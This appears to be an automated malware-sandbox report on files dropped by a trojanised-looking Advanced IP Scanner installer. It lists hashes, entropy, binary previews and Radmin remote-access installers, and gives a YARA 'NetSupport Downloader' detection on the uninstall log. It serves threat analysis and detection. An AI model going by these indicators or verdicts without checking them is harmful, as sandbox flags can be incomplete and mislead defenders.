                                                                                                                      Preview:<.d....!..`...B..........\....;...^...;.......;..!....;.."....;..E....O..^....[..Z....^..1....^..VL..(5......G.......H,..SB..K...B...N:.. ...V...G..._...`.......*.......Sm...y..S........S.......Z......[....t..,O...t..TL...t..^y.....B....j.. ...5t......@...D...H5..\...f...1.......G....................~..4....`..9D...e..].......^.......... =...H..*.y...j.*.y.....*.%..&V.*.0..&..+.......+.....v.+......+......+....().G....!..G....,..H0...^I.Hw9...Y.Hw9.....I....*>.J6....$.J6......J6......J6...Ke.LD......L.b..^..M.S..CN.R.....|.V....1..Wi...]..W.T.....Z.|..U..[f3..X..gc......w0K..I...H...'5......_....T......."..6z...~..8... d..H9...T..0'..2....]......].......cm.9.E..Bj.L.#..f..M$o.....e.....|.l8...8[...^..K...I....h......D.......V.......\...>...u..>......3..1S..l...MH......;..5.l..b..AV...)..y....Z....0..V.......U.......\_..tb..7>...............=......W%......?|......Q..(....Vr.1V...+..R....3..W.<..b..f.~..#.......6...1....-...^..7....5...1..........c..H..;6...d..q.J..R...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):590271
                                                                                                                      Entropy (8bit):7.998650752150742
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
                                                                                                                      MD5:637FB65A1755C4B6DC1E0428E69B634E
                                                                                                                      SHA1:FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
                                                                                                                      SHA-256:B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
                                                                                                                      SHA-512:F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
                                                                                                                      Malicious:false
                                                                                                                      Preview:.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):7.00674396465633
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                                                      MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                                                      SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                                                      SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                                                      SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1180200
                                                                                                                      Entropy (8bit):6.806814022865445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
                                                                                                                      MD5:C553D46852C7015A3DF581FBD2C02C3A
                                                                                                                      SHA1:D768260F818EA400BE5AD8F86280FB92DD37F341
                                                                                                                      SHA-256:F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
                                                                                                                      SHA-512:42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.....:.h.;...:.h.?...:.h.>...:.h.9...:..;...:...;.n.:..<...:......:..>...:..:...:......:..8...:.Rich..:.........................PE..L......]...........!.........p......?........................................@.......3....@.........................p?......l...h.......@...............(..........P9..T............................9..@...............d............................text............................... ..`.rdata...C.......D..................@..@.data...<........^..................@....rsrc...@............@..............@..@.reloc..............F..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1614189
                                                                                                                      Entropy (8bit):5.107077482480661
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
                                                                                                                      MD5:7B844618B571CDACB552622844639A96
                                                                                                                      SHA1:3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
                                                                                                                      SHA-256:8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
                                                                                                                      SHA-512:9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
                                                                                                                      Malicious:false
                                                                                                                      Preview:000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):449280
                                                                                                                      Entropy (8bit):6.670243582402913
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                                                                                      MD5:1FB93933FD087215A3C7B0800E6BB703
                                                                                                                      SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                                                                                      SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                                                                                      SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):300584
                                                                                                                      Entropy (8bit):5.864906645133905
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
                                                                                                                      MD5:E8D9421848C1DDEA1A74EBFDBE452C67
                                                                                                                      SHA1:7F1302F2B64FF785ABF85F5A9579EA12E555233B
                                                                                                                      SHA-256:3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
                                                                                                                      SHA-512:2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1384488
                                                                                                                      Entropy (8bit):6.46559466851362
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
                                                                                                                      MD5:A95683988952CD21F5F6DE5318122B98
                                                                                                                      SHA1:2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
                                                                                                                      SHA-256:10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
                                                                                                                      SHA-512:33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1384488
                                                                                                                      Entropy (8bit):6.46559466851362
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
                                                                                                                      MD5:A95683988952CD21F5F6DE5318122B98
                                                                                                                      SHA1:2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
                                                                                                                      SHA-256:10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
                                                                                                                      SHA-512:33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):51240
                                                                                                                      Entropy (8bit):6.51849694585826
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
                                                                                                                      MD5:1184F4FB8EFAE468729C62787C9ED80B
                                                                                                                      SHA1:A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
                                                                                                                      SHA-256:C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
                                                                                                                      SHA-512:2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):51240
                                                                                                                      Entropy (8bit):6.51849694585826
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
                                                                                                                      MD5:1184F4FB8EFAE468729C62787C9ED80B
                                                                                                                      SHA1:A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
                                                                                                                      SHA-256:C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
                                                                                                                      SHA-512:2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Server 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Server 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Server 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {BBD285CD-D1FE-41B1-B6B4-7FF7C27F553B}, Last Saved Time/Date: Thu Dec 14 03:24:15 2017, Create Time/Date: Thu Dec 14 03:24:15 2017, Last Printed: Thu Dec 14 03:24:15 2017, Code page: 1252, Template: Intel;1033
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6313984
                                                                                                                      Entropy (8bit):7.80157349747762
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:p4Yy6oWmNbrsXB52VA7/YLiIwyxDdYYUPe7fA8ScWmMJ5TpBpB22Omi58:pP1mdrIiVe/cwyxpF7fHScWLjTbedfi
                                                                                                                      MD5:7DBF077665F632BEA55C0D88B7F301A3
                                                                                                                      SHA1:D1D0215FC874F72228BDDAFAB9FBEE5B816737B2
                                                                                                                      SHA-256:AA584952E31F9C521C2D57AF5FAAFA876E78C512A4DAF0A76E11695EA126558A
                                                                                                                      SHA-512:90BD7F02A7838AD83B6CC0E287038568994E07D26B42E66BD0474ADFC6A82299B612CEF01E570FD27EBCFB54B912F333DF91879CD348E06718E3622918368E8F
                                                                                                                      Malicious:false
                                                                                                                      Preview:......................>...................a...............8...................................y.......~........................................................................................................................................................................................................................................ ... ...!...!..."..L...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p............................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D...x...F...X...H...J.......K...L.......V...O...P...Q...R...S...T...U...G...W...J...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Viewer 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Viewer 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Viewer 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {FAB726D2-8076-4144-B0E6-C4FC2A838845}, Last Saved Time/Date: Thu Dec 14 03:24:44 2017, Create Time/Date: Thu Dec 14 03:24:44 2017, Last Printed: Thu Dec 14 03:24:44 2017, Code page: 1252, Template: Intel;1033
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5409792
                                                                                                                      Entropy (8bit):7.888464776356177
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:/YyLObvirO9mCdfl2nus7iOlkwAI2ljeoKleOA56VJJ8bXSUvmdMjGerZSJi:FGKrofl2xG1ICGleD6DJ8DSUv+EJZSJi
                                                                                                                      MD5:8E36ECA249C08969EF5C0822928416D6
                                                                                                                      SHA1:1937E555B760B4A3E13667BE189A9A9B9C9FAF8C
                                                                                                                      SHA-256:052EE17B1544F3E1466DF561D7BAAA4BB694320803102C96FCD3560BEEB3B5C3
                                                                                                                      SHA-512:C7B9DE31660CD56AAC2D30C3EF4E5C041E6A1108B3B058EA08C2C9A08AD235398E15AE5FDC76263476864BB964443035F383EA3CB82FFA715D8583ABEB9C5AB1
                                                                                                                      Malicious:false
                                                                                                                      Preview:......................>...................S...............8....................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0....................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D.......F...Y...H...J.......K...M...........W...P...Q...R...S...T...U...V...G...X.......Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):590271
                                                                                                                      Entropy (8bit):7.998650752150742
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
                                                                                                                      MD5:637FB65A1755C4B6DC1E0428E69B634E
                                                                                                                      SHA1:FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
                                                                                                                      SHA-256:B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
                                                                                                                      SHA-512:F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
                                                                                                                      Malicious:false
                                                                                                                      Preview:.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):282664
                                                                                                                      Entropy (8bit):6.463228483563671
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
                                                                                                                      MD5:BA337B8D1BC9F117F7605A2B79B10064
                                                                                                                      SHA1:9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
                                                                                                                      SHA-256:EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
                                                                                                                      SHA-512:277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):900288
                                                                                                                      Entropy (8bit):6.823623458577979
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
                                                                                                                      MD5:3E0303F978818E5C944F5485792696FD
                                                                                                                      SHA1:3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
                                                                                                                      SHA-256:7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
                                                                                                                      SHA-512:C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:InnoSetup Log Advanced IP Scanner {FFA0FB35-59D6-4B0D-863C-1431EA12E295}, version 0x418, 6118283 bytes, 226546\37\user\376, C:\Program Files (x86)\Advanced IP Scanner
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6118283
                                                                                                                      Entropy (8bit):4.024290140131809
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:UhlFVfsWKHsBLL2NpPytQCiNQj716hKpKe2f8E2U/c:s
                                                                                                                      MD5:DC6ED1014AF1072F1B921AEF65FCE079
                                                                                                                      SHA1:A6E496747B953DBD192E23A3335ED11BD16E9DAA
                                                                                                                      SHA-256:8EA3DE92CB9BC85FBEF6B63AB34B0BFB54E619132E12682E9E4308CA16FD6F9A
                                                                                                                      SHA-512:3C74220A252D374BB866C55869E1DB8C21D6730F0F3A92AD2D59FA27A2FC7123DE45D8F46A91940254A4AEAAA62AA9CC82976D2EDF8E4D460AF05CD5D701C432
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security
                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................{FFA0FB35-59D6-4B0D-863C-1431EA12E295}}.........................................................................................Advanced IP Scanner......................................................................................................................[].................................................................................................................f............e0|...............2.2.6.5.4.6......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r....................... ......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
